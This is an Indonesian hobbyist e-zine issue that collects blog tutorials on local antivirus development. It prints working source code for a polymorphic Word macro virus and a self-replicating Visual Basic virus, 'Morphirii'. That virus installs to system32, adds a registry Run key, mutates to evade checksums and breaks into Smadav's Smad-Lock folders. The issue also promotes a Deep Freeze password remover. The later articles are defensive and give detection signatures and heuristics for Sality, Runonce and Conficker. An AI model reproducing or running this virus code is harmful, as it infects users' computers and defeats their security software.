Morphozine Edisi 1 - April 2010 Lalu pertahanan selanjutnya ada yang dinamakan polymorphic. Ini ada sourcenya… Source

code dulunya saya dapat dari salah satu web virologist asing yang cukup terkenal. Dan source yang berikut ini sudah saya edit. Sub MAIN On Error Goto Done Dim lokasi as string lokasi = FileName$() If lokasi = “” Then Goto Finish If VInstalled = 0 Then Run1 Run2 FileSaveAll 1, 1 Else Goto Done End If Done: lokasi = FileName$() If lokasi = “” Then Goto Finish Else Insert ” “ End If Finish: MsgBox “polymorph”, – 8 End Sub Sub Run1 X$ = Fun$(F$, G$, H$, J$) Y$ = Fun$(F$, G$, H$, J$) Z$ = X$ + Y$ R1$ = GetDocumentVar$(“VirNameDoc”) CO$ = FileName$() + “:” + R1$ MacroCopy CO$, “Global:” + Z$ SetProfileString “Intl”, “Info2″, Z$ ToolsCustomizeKeyboard .KeyCode = 65, .Category = 2, .Name = Z$, .Add, .Context = 0 End Sub Sub Run2 X$ = Fun$(F$, G$, H$, J$) Y$ = Fun$(F$, G$, H$, J$) Z$ = X$ + Y$ R2$ = GetDocumentVar$(“VirName”) OC$ = FileName$() + “:” + R2$ MacroCopy OC$, “Global:” + Z$ SetProfileString “Intl”, “Info1″, Z$ ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = Z$, .Add, .Context = 0

21

Morphozine Edisi 1 - April 2010 End Sub Function VInstalled CC$ = GetProfileString$(“Intl”, “Info1″) VInstalled = 0 If CountMacros(0) > 0 Then For i = 1 To CountMacros(0) If MacroName$(i, 0) = CC$ Then VInstalled = 1 End If Next i End If End Function Function Fun$(F$, G$, H$, J$) One = 1169 Two = 9294 Num = Int(Rnd() * (Two – One) + One) A$ = Str$(Num) A$ = LTrim$(A$) B$ C$ D$ E$

= = = =

Mid$(A$, Mid$(A$, Mid$(A$, Mid$(A$,

1, 2, 3, 4,

1) 1) 1) 1)

If If If If If If If If If If

B$ B$ B$ B$ B$ B$ B$ B$ B$ B$

= = = = = = = = = =

“1″ “2″ “3″ “4″ “5″ “6″ “7″ “8″ “9″ “0″

Then Then Then Then Then Then Then Then Then Then

F$ F$ F$ F$ F$ F$ F$ F$ F$ F$

= = = = = = = = = =

“A” “B” “C” “D” “E” “F” “G” “H” “I” “J”


C$ C$ C$ C$ C$ C$ C$ C$ C$ C$

= = = = = = = = = =

“1″ “2″ “3″ “4″ “5″ “6″ “7″ “8″ “9″ “0″


G$ G$ G$ G$ G$ G$ G$ G$ G$ G$

= = = = = = = = = =

“H” “I” “J” “K” “L” “M” “N” “O” “P” “Q”


D$ D$ D$ D$ D$ D$ D$ D$ D$ D$

= = = = = = = = = =

“1″ “2″ “3″ “4″ “5″ “6″ “7″ “8″ “9″ “0″


H$ H$ H$ H$ H$ H$ H$ H$ H$ H$

= = = = = = = = = =

“A” “B” “C” “D” “E” “F” “G” “H” “I” “J”

22



E$ E$ E$ E$ E$ E$ E$ E$ E$ E$

= = = = = = = = = =

“1″ “2″ “3″ “4″ “5″ “6″ “7″ “8″ “9″ “0″


J$ J$ J$ J$ J$ J$ J$ J$ J$ J$

= = = = = = = = = =

“R” “S” “T” “U” “V” “W” “X” “Y” “Z” “Q”

Fun$ = F$ + G$ + H$ + J$ End Function Sekian tutorial kita…

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/12/21/source-code-polymorphic-untuk-virus-macro/

23


Cara Praktis Matikan DEEPFREEZE Mungkin sebelumnya kamu sudah tahu cara ini, tapi mungkin sebagian yang lain blum tahu tentang cara hebat ini.

Sebelumnya di MorphostLab sudah ada artikel yang judulnya “Tiga Langkah Matikan

Deepfreeze”. Dan memang cukup populer artikel itu. Di MorphostLab sendiri artikel itu masuk 5 besar Top Artikel tahun 2009 (di MorphostLab loh.)

Dan kali ini, MorphostLab pun kembali dengan artikel barunyaa tentang deepfreeze. Nah sebelumnya saya berterima kasih kepada pengunjung MorphostLab yang sudah memberi software ini pada morphostLab. Sayangnya saya lupa siapa nama pengunjung tersebut. Langsung saja, perkenalkan satu software yang bakal jadi tools terbaikmu!

Tak Fanar Deep Freeze Password Remover. Bedanya artikel ini dengan artikel kami yang dulu adalah, kali ini lebih praktis karena ada tools.

Mantap kali si pembuatnya ini. (sayangnya kami tidak tahu siapa yang membuat) Fungsi tools ini adalah untuk menghapus password deepfreeze. Sehingga kamu tidak perlu password lagi untuk mengubah deepfreeze menjadi “Thawed”

24

Morphozine Edisi 1 - April 2010 Cara penggunaannya sangat mudah. Cukup klik tulisan atau tombol “Remove” Hingga pada akhirnya muncul gambar berikut.

Ukuran software/tools ini cukup kecil kok, Cuma sekitar 115KB.

Sehingga kamu bisa membawanya kemana-mana dengan flashdisk. (kalo mau pake disketpun gak apa-apa. Emang masih zaman?xixixixi)

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/12/27/cara-praktis-dan-baru-matikan-deepfreeze/

25


TRIK SCANNING FILE

SHORTCUT ! Sejauh ini masih belum banyak antivirus lokal yang bisa menscan file-file shortcut. Yang

bisa hanya ada beberapa dan itu pun antivirus-antivirus lokal yang sudah senior. Salah satu antivirus lokal yang bisa menscan file shortcut adalah Morphost.

Pertama kali Morphost bisa menscan file shortcut saat maraknya virus vinorika (atau biasa

disebut virus Yuyun). Nah, mudah-mudahan dengan trik ini antivirus buatanmu juga bisa menscan file shortcut!

Function DetectScript(alamat as string) as Boolean Dim exten As String Dim skrip As String exten = UCase(Right(alamat, 3)) ‘untuk lihat ekstensi file If exten = “LNK” Then skrip = UCase(Fileteks(alamat)) If InStr(skrip, “WSCRIPT.EXE”) > 0 Then GoTo bawah ‘jika ada tulisan WSCRIPT.EXE maka itu virus! If InStr(skrip, “.DLS”) > 0 Then GoTo bawah ‘jika ada tulisan .DLS maka itu virus! If InStr(skrip, “RUNDLL32″) > 0 Then GoTo bawah ‘jika ada tulisan RUNDLL32 maka itu virus! ElseIf exten = “COM” Then ‘ sekaligus aku kasih trik untuk deteksi EICAR skrip = UCase(Fileteks(alamat)) If InStr(skrip, “EICAR”) > 0 Then DetectScript = True Namavirus = “EICAR VIRUS TEST” End If End If Exit Function bawah: namavirus = “Fake Shortcut” DetectScript = True End function ‘Fungsi ini untuk membaca file teks Function Fileteks(Where As String) As String Dim BinTeks, Temp As String Open Where For Input As #6 On Error Resume Next Do While Not (EOF(6)) Input #6, Temp BinTeks = BinTeks & Temp

26

Morphozine Edisi 1 - April 2010 Loop Close #6 FileTeks = BinTeks End Function Anggap saja trik deteksi file EICAR di atas itu sebagai bonus. Hihihi… Yah, biar AV-mu juga

lolos test EICAR sama seperti Morphost dan antivirus lainnya.

Untuk virus vinorika, biasanya ada string “WSCRIPT.EXE” disetiap file shortcut yang

dibuatnya. Lalu untuk “.DLS” dan “RUNDLL32.EXE”, itu juga string yang menunjukkan bahwa si shortcut link dari suatu virus. Khusus kedua string ini saya dapatkan dari salah satu virus vbs yang

baru. Nah, kamu bisa tambahin sendiri string-string lainnya, supaya AV-mu bisa semakin ganas. Tapi awas FALSE ALARM!!!

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2010/01/18/trik-scanning-file-shortcut/

27


Bobol

SmAd-Lock !

A

walnya saya berpikiran apakah ada celah di smad-lock? Saya yakin mas Nafarin sendiri tahu bagaimana ’membolongi’ keamanan smad-lock (karena memang dia yang buat. Ha

ha ha). Kebetulan saya temukan cara untuk menyusup ke dalam smad-lock itu (saya

yakin mas Nafarin tahu caranya. Dan beberapa VM lokal lain juga tahu bagaimana caranya), dan saya sudah buat satu sampel virus uji. Saya sebut namanya Morphirii-A.

Si Morphirii bakal masuk menyusup ke dalam smad-lock. Mengcopykan dirinya ke dalam,

lalu membuat satu pesan (satu file notepad) di dalamnya, sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Dulu rencananya trik ini tidak akan aku sebarkan. Tapi setelah aku berpikir sana dan

berpikir sini, ternyata toh suatu saat bakal ada juga orang yang tahu trik ini. Yah mudah-mudahan aja blog MorphostLab yang pertama kali ngepost trik ini.

Setelah didesak banyak orang (mail-ku dibanjiri banyak email masuk), akhirnya trik ini

akan saya bocorkan juga. Sekedar memenuhi permintaan pembaca dan pengunjung MorphostLab.

Nah, sekarang buka VisualBasic-mu. Lalu masukkan referensi ”Microsoft Scripting Runtime.” Perhatikan gambar dibawah ini.

Kemudian masukkan satu listbox ke dalam form. Namai listbox tersebut list1 Lalu ketikkan source berikut:

Private Declare Function GetLogicalDrives Lib “kernel32″ Alias “GetLogicalDrives” () As Long Dim fso As New Scripting.FileSystemObject

28

Morphozine Edisi 1 - April 2010 Private Sub Form_Load() ambilDrive install regist End Sub Sub regist() Dim b As Object Set b = CreateObject(“wscript.shell”) b.regwrite “HKLM\Software\microsoft\windows\currentversion\run\Morphirii”, Environ$(“windir”) & “\system32\Morphirii.exe” End Sub Sub install() MutasiKe Environ$(“windir”) & “\system32\morphirii.exe” End Sub Fungsi source diatas itu untuk menginstallkan diri ke dalam komputer korban dan

membuat startup di regedit. Saya rasa semua sudah mengerti ini.

Function MutasiKe(Lokasi As String) If fso.FileExists(Lokasi) Then Exit Function ReDim KodeVirus(FileLen(App.Path & “\” & App.EXEName & “.exe”)) As Byte Open App.Path & “\” & App.EXEName & “.exe” For Binary As #1 Get #1, , KodeVirus Close #1 Open Lokasi For Binary As #1 Put #1, , KodeVirus Put #1, , Format(Time, “hh:mm:ss”) & ” ” & Format(Date, “dd:mm”) Close #1 End Function Buat fungsi ‘Mutasike’ untuk trik polymorphic. Trik ini fungsinya untuk menghindarkan diri dari pendeteksian checksum file seperti crc32 dan md5. Yang ini saya rasa juga pada ngerti

semuanya. Setelah ini masukkan satu timer. Namai timer tersebut “Timer1” dan berikut ini source untuk timer tersebut. Private Sub Timer1_Timer() Dim i As Integer ambilDrive For i = 0 To List1.ListCount – 1 If fso.FolderExists(List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916)) Then DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916) ElseIf fso.FolderExists(List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)) Then DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916) End If Next End Sub Si Timer akan melaksanakan kerjanya yaitu mengerjakan suatu trik yang kita sebut “Do

Trick”. Untuk intervalnya bisa kalian set sendiri. Morphirii memakai interval 10000 (kira-kira 10 detik).

29

Morphozine Edisi 1 - April 2010 Lihat source di atas, virus kita ini bakal mengecek 2 jenis smad-lock! Smad-lock yang

bertulisan “Brankas Smadav” dan yang satunya lagi tidak bertuliskan ”Brankas smadav” Sub ambilDrive() On Error Resume Next Dim LDs As Long, lng As Long, sDrives As String LDs = GetLogicalDrives For lng = 0 To 25 If (LDs And 2 ^ lng) 0 Then List1.AddItem Chr(lng + 65) & “:\” End If Next lng End Sub

Code ini fungsinya untuk mencari drive-drive yang aktif. Code ini bisa diganti dengan yang code lebih baik.

Function DoTrick(drive As String) fso.CopyFolder drive, App.Path & “\Hajar” Open App.Path & “\Hajar\Read Me.txt” For Output As #1 Print #1, “Smad-Lock ini berhasil disusupi oleh Morphirii” Close #1 Open App.Path & “\Hajar\Morphirii.txt” For Output As #1 Print #1, “Smad-Lock tidak lagi aman” Print #1, “Smad-Lock ini berhasil disusupi oleh Morphirii” Print #1, “” Print #1, “Morphirii by: Morphic” Print #1, “File ini bukan 100% virus” Print #1, “hanya untuk uji antivirus anak bangsa…” Close #1 MutasiKe App.Path & “\Hajar\Morphirii_2010.exe” fso.CopyFolder App.Path & “\Hajar”, drive, True fso.DeleteFolder App.Path & “\Hajar” End Function Ini adalah trik yang kita maksud. Morphirii akan mengcopykan dirinya ke dalam smad-lock,

dan membuat satu file notepad di dalamnya sekaligus memodif file ’readme.txt’ yang ada di dalamnya. Kalau kamu mau menghapus smad-lock-nya mudah saja. Codenya begini: Fso.DeleteFolder (List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916)) Atau Fso.deletefolder List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)) Then DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916) Itupun setelah dilakukan pengecekan drive oleh Listbox yang tadi supaya tidak terjadi kacau balau ya…

30

Morphozine Edisi 1 - April 2010 Untuk penghapusan folder autorun.inf bisa dengan trik ini: Sub hapusAuto(Dirname as strign) On Error Resume Next Shell (“CMD /C RD /S /Q \\.\\” & Chr(32) & Chr(34) & DirName & Chr(34)), vbHide End Sub Jadi untuk menghapus folder “F:\autorun.inf” codenya menjadi hapusAuto “F:\autorun.inf” Dan berikut adalah komentar resmi dari pembuat Smadav, Zainuddin Nafarin :

"

Ok, terima kasih atas pengetesannya. Saya akan coba jelaskan sedikit.

Smad-Lock memang masih mungkin ditembus oleh sebagian kecil virus yang (1) secara keseluruhan atau (2) hanya sebagian fungsinya yang mendukung path UNICODE. Untuk tipe yang pertama, yaitu virus yang secara keseluruhan mendukung UNICODE, bahkan bisa menginfeksi dokumen/file dalam folder Smad-Lock, tapi sampai sekarang saya belum ada menemukan virus seperti ini khususnya di Indonesia yang bisa menginfeksi dokumen (bukan executable), yang ada hanyalah virus asing yang bisa menginfeksi exe. Untuk tipe virus yang kedua, hanya mempunyai sebagian fungsi yang mendukung path UNICODE, hanya akan mampu meng-copy filenya ke dalam folder Smad-Lock dan kebanyakan tidak memodifikasi file-file lainnya yang sudah ada di dalam folder Smad-Lock. Virus jenis ini mungkin bisa diperkirakan ada kurang dari 5% dari seluruh virus lokal yang menyebar di Indonesia. Jadi, folder Smad-Lock jelas masih ada celahnya dan memang tidak mungkin 100% aman. Semangat terus untuk terus belajar dan mengembangkan ilmu yang bermanfaat untuk orang lain dan Indonesia !! Good Luck

"

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/12/27/smad-lock-tidak-lagi-aman/

31


Source Code Deteksi

Virus RUNONCE Kelihatannya Runonce pengen mengikuti jejak sality, alman dan lain-lainnya, suka menginfeksi file-file “.exe”. Virus ini cukup terkenal sebenarnya dan hampir semua AV impor

sudah bisa mendeteksi virus ini sekaligus file-file terinfeksinya. Namun sayang, tidak semua antivirus lokal bisa mendetek virus ini. Runonce sendiri begitu dieksekusi akan menginfeksi hampir semua file “.exe” seberapa ia

sanggup. Lalu mendrop induknya ke folder “system32”. Kemudian yang paling menarik lagi si Runonce menyebarkan file-file email ke setiap folder. Saya menguji 3 antivirus lokal. Salah satunya Morphost dan dua yang lain adalah antivirus

lokal lain. Salah satu antivirus lokalnya (sebut saja Antivirus A) bisa mendeteksi file-file terinfeksi

Runonce dengan baik. Dan semua file yang terdeteksi diberinya nama “Suspected.Virut.” Sayangnya Antivirus A ini tidak mendeteksi file-file “email” yang dibuat oleh si Runonce.

Antivirus yang kedua (sebut saja antivirus B), malah sama sekali tidak mendeteksi file-file

yang diinfeksi oleh Runonce begitu juga file-file email yang dibuat oleh virus runonce. Antivirus yang ketiga (antivirus Morphost) bisa mendeteksi file-file email tersebut dengan baik. Untuk

Morphost Accords, file-file yang terinfeksi memang masih belum terdetek namun untuk versi Morphost Expert file-file yang diinfeksi Runonce sudah bisa dideteksi.

Di tutorial kali ini saya akan berikan sedikit source khusus untuk mendeteksi Runonce ini. Begini code-nya. Option Explicit Dim NamaVirus as String Function DetectRunonce(lpFileName as string) as boolean Dim filedata as string Dim Malscr as string Dim IsExe as string Open lpfilename For Binary As #1 filedata = Space$(2) Get #1, , filedata Close#1 If ucase(filedata) = “MZ” then Isexe = “1” Elseif ucase(filedata) = “HE” then Isexe = “2” End if If isexe = 1 then If FileLen(lpfilename) > 1750 Then

32

Morphozine Edisi 1 - April 2010 If WatchString(lpfilename, 1750, 100, “IMISSYOU”) Then Detectrunonce = true Namavirus = “Terinfeksi: Runonce” End If End If Elseif isexe = 2 then MalScr = UCase(FileTeks(filename)) If InStr(MalScr, “IMISSYOU”) > 0 Then Detectrunonce=true Namavirus= “Fake Email” End If End if End function Function FileTeks(Where As String) As String Dim BinTeks, Temp As String Open Where For Input As #6 On Error Resume Next Do While Not (EOF(6)) Input #6, Temp BinTeks = BinTeks & Temp Loop Close #6 FileTeks = BinTeks End Function Function WatchString(AlamaT As String, mulai As Long, banyaknya As Integer, apaygdicari As String) As Boolean Dim bin() As Byte Dim filedata As String WatchString = False Open AlamaT For Binary As #8 filedata = Space$(banyaknya) Get #8, FileLen(AlamaT) – mulai, filedata Close #8 If InStr(UCase(filedata), apaygdicari) > 0 Then WatchString = True End Function Itu dia source code bagaimana cara mendeteksi virus Runonce.

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2010/01/13/source-code-detect-runonce/

33


Bagaimana Cara MORPHOST Mendeteksi Sality ?

B

anyak orang bertanya-tanya, sebenarnya apa sih string yang cocok untuk deteksi file infeksi sality? Wajar, banyak AV lokal yang mendeteksi virus hanya dengan cek string saja

dan melupakan pendeteksian dengan PE. Ada dua caranya memang untuk deteksi file

infeksi sality. Cara pertama dengan string cara kedua dengan PE Header. Nah untuk cara pertama

kamu harus tahu dulu string apa yang cocok ya? Sebenarnya banyak string-nya. Gak hanya satu untuk deteksi satu full varian.

Sebagai bonus untuk membaca artikel ini saya bocorkan satu string untuk Sality varian AA

(menurut Morphost dan menurut nama internasionalnya). String itu adalah “ Ü/6! ". Hati-hati! String itu string Ucase loh! Kamu juga boleh pake “ /6! ” tanpa huruf “ Ü ”, kalo kamu pake 3 huruf ini maka lebih banyak file infeksi yang terdetek loh. Bener! tapi saya pernah ngalamin falsedetek satu kali…

Tapi kalo kamu pake ” Ü/6! ” (pake huruf “ Ü ”), file infeksi sality yang terdetek hanya

sedikit). Tapi jangan salah loh, ada juga file infeksi sality-AA lainnya yang lolos deteksi string ini. Untuk itu kamu harus cari string lainnya. Anggap string ini hanya bonus.

Lalu selain Sality-AA, ada juga varian sality lain yang cukup membandel di Indonesia. Yaitu

Sality-AE. Ini varian terbaru dan masuk 20 besar malware kasus terbanyak di dunia. Untuk SalityAE ini kamu bisa pakai string “ QÏËXR ”. Yang ini juga, anggap saja bonus. Untuk string lainnya cari sendiri.

Lalu kita masuk ke cara kedua yaitu dengan PE Header. Kamu bisa pakai tools apa saja deh.

Cari aja di google, source code untuk melihat PE Header suatu file. Banyak kok. Nah, sebagai tutorial saya ambil contoh PE Header yang dibuat oleh Kira Yamato. Kamu bisa pakai source lainnya (gak harus source Kira Yamato kok).

Untuk deteksi sality kita hanya perlu melihat sectionnya saja. Gambar di atas adalah hasil

34

Morphozine Edisi 1 - April 2010 PE Header dari satu file. File yang bukan terinfeksi. Sectionnya seperti berikut. .text .data .rsrc Ada tiga section disitu! Sekarang kamu coba browse lalu cari file bersih lainnya! Saya coba untuk mencari file lain dan hasilnya seperti berikut.

.text .rdata .reloc Ingat nama-nama section bisa saja berbeda dan jumlah section pun bisa aja berbeda. Kadang ada hanya satu atau kadang ada file yang punya 10 section. Baiklah, sebelum kita periksa file yang terinfeksi Sality, kita coba cari satu file normal lain. Dan hasil file yang saya browse

adalah sebagai berikut. .text .rdata .data .rsrc Oke. Coba browse salah satu file infeksi sality yang kamu punya! File yang saya punya hasilnya sbg berikut. File Pertama hasilnya: UPX0 UPX1 .rsrc .0UPX1 File yang Kedua hasilnya: .text .rdata .data .rsrc .irdat

File yang Ketiga hasilnya: UPX0 UPX1 .rsrc .EUPX1 File yang Keempat hasilnya: .text .rdata .data .rsrc .drdat

Sabar. Mungkin kamu bingung… Apa-apaain ini semua. Tenang. Nyantai aja dulu. Begini,

tadi di atas, kita sudah cek empat file infeksi sality. Yang perlu ditekankan disini adalah keempat file yang terakhir kita cek adalah file infeksi virus!

Kita coba cek file pertama dulu ya. Sebenarnya, File pertama kita di atas sebelum diinfeksi,

sectionnya sebagai berikut: UPX0 UPX1 .rsrc Tapi setelah diinfeksi ternyata ada tuh, satu section muncul. SECTION PALING AKHIR!!! Muncul section .0UPX1

35

Morphozine Edisi 1 - April 2010 Logikanya mudah saja. JIKA SECTION TERAKHIR MIRIP DENGAN SECTION NOMOR DUA,

MAKA KEMUNGKINAN BESAR 75% FILE TERSEBUT TERINFEKSI VIRUS! Coba analisis file pertama ini! Bandingkan Section terakhir dengan Section kedua .0UPX1 (section terakhir)

UPX1 (section nomor 2).

Mirip!!! Oke, mungkin kamu masih bingung, coba kita analisis file Kedua yang hasilnya sbg

berikut: .text .rdata .data .rsrc .irdat

Bandingkan section terakhir dengan section nomor 2. .irdat (section terakhir)

.rdata (section nomor dua)

CATATAN: Nama section tidak bisa lebih dari enam karakter! Itu sebabnya section terakhir file Kedua bukan “.irdata” melainkan “.irdat”

Bagaimana? Sampai disini sudah mengerti? Oke, kita analisa lagi deh file Ketiga! Hasil sectionnya sebagai berikut: UPX0 UPX1 .rsrc .EUPX1 Bandingkan section terakhir dengan section nomor dua. .EUPX1 (section terakhir)

UPX1. (section nomor dua)

Jawabannya: file ini 75% kemungkinan terinfeksi Sality!!! Lalu 25% lagi? Oke, sabar. Kita analisis dulu file Keempat ya! Daftar sectionnya sbg berikut: .text .rdata .data .rsrc .drdat Silakan bandingkan section terakhir dengan section nomor dua. .drdat (section terakhir)

.rdata (section nomor dua)

Kuncinya begini, kalau section nomor dua adalah (.data) maka section terakhir pasti

(.*data) -tanda bintang “*” menandakan karakter bebas- misal: (.adata, .bdata, .xdata, .odata dan lain-lain).

Kalau section nomor dua adalah(.rdata) maka section terakhir pasti (.*rdat)misal

(.irdata, .ordata, .srdata dan lain-lain)

36

Morphozine Edisi 1 - April 2010 Saya harap kamu mengerti. Oke. Pertanyaannya sekarang, bagaimana menentukan 25%

lagi? Dari tadi Cuma 75% terus. Yap, 25% lagi untuk menentukan file yang kita cek apakah benarbenar terinfeksi sality. Coba browse lagi salah satu file infeksi sality!

Analisis section terakhir lalu periksa Flags Section terakhir! Kalau nilainya “E0000020” maka

file tersebut 100% terinfeksi virus Sality!!!! Trik ini sudah diterapkan di Morphost Antivirus. Dan

saya menduga bahwa metode ini jugalah yang dipakai oleh antivirus-antivirus luar/asing (yang biasa kamu pakai itu).

Antivirus lokal sendiri masih banyak yang masih pakai teknik checksum. Memang teknik

checksum tidaklah salah. Tapi sangatlah fatal kalo checksum file terinfeksi yang dimasukkan ke dalam database antivirus. Ya kan? Setiap file terinfeksi virus pasti punya checksum yang berbeda tentunya.

Antivirus lokal yang pakai teknik ini pun masih sangatlah sedikit. Jadi tidak ada salahnya

kalau kamu pakai Morphost Antivirus untuk melindungi komputer anda. Hehehehee. Smad*v, salah satu antivirus lokal yang berslogan “antivirus kebanggaan Indonesia” belum pakai teknik ini. Jadi kalau kamu sudah bisa terapkan teknik ini pada antivirusmu, maka antivirusmu sudah selangkah lebih maju dibanding Smad*v.

Mudah-mudahan ilmu yang saya sampaikan ini berguna untukmu. Dan kembangkanlah.

Karena dengan teknik-teknik semacam ini pula, Morphost mampu mendeteksi virus-virus internasional lainnya seperti Alman, Sohanad, Tenga atau Gaelicum, Parite, Pharaoh, Runonce atau chirB, Virut, Autoit.Var, Recycler.Var (next revision), dan Small (next revision). Saya rasa saat ini

Morphost menjadi antivirus di Indonesia yang mendeteksi lebih banyak file infeksi virus internasional!

Dan mungkin Morphost akan mendeteksi kasus infeksi lebih banyak lagi di revisi

berikutnya. Jangan lupa, cantumkan nama “Morphic Karta” dan “Morphost” di your “About Me” yaaa….Karena saya anggap itu sebagai tanda terima kasih dan saya juga akan doakan supaya Tuhan tetap membantu kalian untuk mengembangkan teknik ini.

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2010/02/06/bagaimana-cara-morphost-mendeteksi-sality/

37


Deteksi Module Sality Tanpa Checksum Kalau saya sebut module mungkin ada yang protes. Dan memang yang saya maksudkan

disini adalah file library milik virus Sality. Tiap kali komputer terinfeksi virus Sality ini biasanya muncul file di folder system32 yang berfilename “wmdrtc32.dll”.

Alamat jelasnya adalah“C:\windows\system32\wmdrtc32.dll”

Sebenarnya masalah ini sangatlah simple… benar-benar simple… Pertanyaan utamanya

ialah bagaimana mendeteksi file ini tanpa checksum? Sebagian dari pembaca pasti menjawab dengan “STRING”. Ya itu jelas benar. Tapi apa harus semua file dicek stringnya? Jelas ini membutuhkan waktu yang sangat panjang.

Nah, di dalam artikel yang super sederhana ini ada trik yang mungkin belum terpikirkan

atau mungkin terlupa saat ini mengenai pendeteksian module virus sality dan juga file induk virus Conficker.

Saya punya dua file module Sality ini, karena dulu laptop saya pernah kena sality dua kali.

Sedangkan file module sality lainnya saya peroleh dari kiriman pengguna Morphost. Jadi totalnya ada banyak dan hampir berbeda semua file module-nya.

Dari 5 antivirus lokal terbesar saat ini di Indonesia (PCMAV, Morphost, Ansav, Smadav dan

CMC), hanya ada tiga antivirus lokal yang mendeteksi file module sality ini dengan sangat baik,

yaitu Pcmav, Morphost dan Ansav. (maaf, bukan maksud saya menyebutkan nama antivirus lokal dengan sengaja).

Dan setelah saya uji ternyata dua antivirus lokal (selain morphost) mampu mendeteksi file

module sality ini tanpa checksum. Mereka tidak butuh checksum untuk mendeteksinya. Tentunya “mungkin” pakai string.

Dan saya tidak tahu apakah mereka memeriksa setiap file untuk pengecekan/pemeriksaan

module sality? Yang tahu hanya pembuatnya dan Tuhan. Hehehe…

Ada beberapa trik dan ada kelemahannya juga tentunya… Trik pertama, yaitu dengan

memeriksa keberadaan file module sality tersebut. Dan cara ini saya yakin sangat kuno, tapi saya tidak yakin apakah sudah ada antivirus lokal yang pakai teknik ini??? Saya kira belum.

Teknik ini dilakukan dengan pemeriksaan file “C:\windows\system32\wmdrtc32.dll” (di

komputer saya) atau Environ$(“windir”)

&

“\system32\wmdrtc32.dll” Dengan logika

38

Morphozine Edisi 1 - April 2010 tersebut tentunya antivirus lokal akan segera memberikan pernyataan kalau ditemukan module sality tersebut.

Namun trik ini punya kelemahan. Apabila si User punya koleksi virus, tentunya antivirus

lokal tidak akan dapat mendeteksi module virus tersebut. Sebelum saya melanjutkan, saya ingin beritahu kenapa saya beranggapan file module ini penting. Setelah saya perhatikan, sepertinya file

“wmdrtc32.dll” ini lah yang merupakan inti dari Sality. Untuk cara penghapusan file tersebut tergantung orang masing-masing dan tidak akan dibahas disini.

Dan saya juga mau minta maaf, karena untuk artikel kali ini saya tidak akan membahas

source code tapi hanya teori. Tapi saya yakin anda mengerti teori yang saya jelaskan ini, dan anda dengan mudahnya menerapkannya ke dalam suatu source code. Saya yakin! Oke, baiklah. Kita lanjutkan lagi…

Cara berikutnya, yaitu pemeriksaan khusus untuk file yang berekstensi “.dll” Logikanya begini, antivirus lokal menscan file “.dll” dengan metode khusus. Tiap kali scanner menjumpai file yang berekstensi “.dll” akan diperiksa string module Sality-nya. Kalau memang ada berarti file tersebut positif file library sality! Kelemahan dari cara ini adalah, kalau suatu saat ada user yang pintar yang ingin menguji antivirus lokal maka file library sality ini akan diubah

checksumnya. Yang tadinya berfilename “wmdrtc32.dll” akan diubah menjadi “wmdrtc32.exe” Kalau checksumnya sedikit saja diubah, cara di atas akan gagal.

Cara selanjutnya dengan nama file saja (tanpa ekstensi). Lakukan pemeriksaan terhadap

filename “wmdrtc32”. Kebanyakan programmer pasti berpikiran ke arah situ. Tapi anjuran saya, lakukan pemeriksaan terhadap file yang berfilename “wmdr” atau “tc32” atau “drtc”. Nah, ada tiga opsi. Dan saya yakin ini sangatlah ampuh dibanding pemeriksaan pada filename “wmdrtc32” Kita ambil contoh:

Suatu antivirus lokal yang mempunyai metode pemeriksaan pada filename “wmdrtc32”

mungkin mampu mendeteksi module sality yang memang berfilename “wmdrtc32.dll”. Kalaupun ekstensinya diubah tetap saja terdeteksi! Tapi kalau filenamenya diubah? Yang tadinya “wmdrtc32.dll” diubah menjadi “wmxdrtc32x.dll”. Apakah masih terdeteksi?

Oleh karena itu, seperti yang saya anjurkan di atas, lakukan pencarian terhadap file yang

berfilename “wmdr” atau “tc32” atau “drtc” atau boleh kamu tambahkan lagi yang lain… Trik ini tidak jauh bedanya untuk mendeteksi virus Conficker. Sabar! Setelah ini akan kita bahas langsung!

Sebelum kita masuk ke pembahasan virus conficker, ada satu pertanyaan penting lagi

muncul. Apa itu? String apa yang cocok untuk module sality ini? Saya rasa string “ SZDDˆÐ’3A” pun sudah cukup. Dan, yang perlu saya ingatkan lagi string yang saya berikan ini udah dalam kondisi UCASE.

Oke, kita masuk ke pembahasan virus Conficker!

Dulu saya sudah pernah bahas tentang pendeteksian Conficker ataupun Fakta dari conficker. Dan saya yakin semua sudah tahu nama file induk conficker ini. Yaitu “jwgkvsq.vmx”

Saya sudah mencoba dua antivirus lokal yaitu Morphost dan Smadav (sekali lagi, saya tidak

bermaksud untuk menyebutkannya dengan sengaja). Karena saya beranggapan kalau dua antivirus ini memang menggunakan cara licik untuk pendeteksian virus Conficker.

Dan saya yakin banyak juga antivirus lokal lain yang mengikuti dua antivirus lokal ini

(Morphost dan Smad**). Jawabannya, dengan teknik ini file “jwgkvsq.vmx” terdeteksi sebagai virus. Tapi tentunya dengan beberapa syarat. Mungkin dengan adanya string “MZ” didalam file

39

Morphozine Edisi 1 - April 2010 tersebut sebagai bukti bahwa file tersebut adalah file aplikasi, dan mungkin juga dengan syaratsyarat lainnya.

Tapi apakah file “jwgkvsq(1).vmx” terdeteksi? Atau file “Copy of jwgkvsq.vmx” juga ikut

terdeteksi? Jawabannya adalah ABSOLUTELY NOT!!! Tidak terdeteksi! MIsalnya saya sudah uji antivirus Smad**

Itu dia masalahnya! Kenapa hal simple seperti ini masih saja belum terpikir??? Hal kecil

selalu tidak terpikirkan! Antivirus hebat seperti Smad** belum sempat memikirkan hal ini mungkin.

Nah, anjuran saya lakukanlah pemeriksaan pada file yang berfilename “jwg” atau “kvsq”

ataupun ekstensi “vmx”

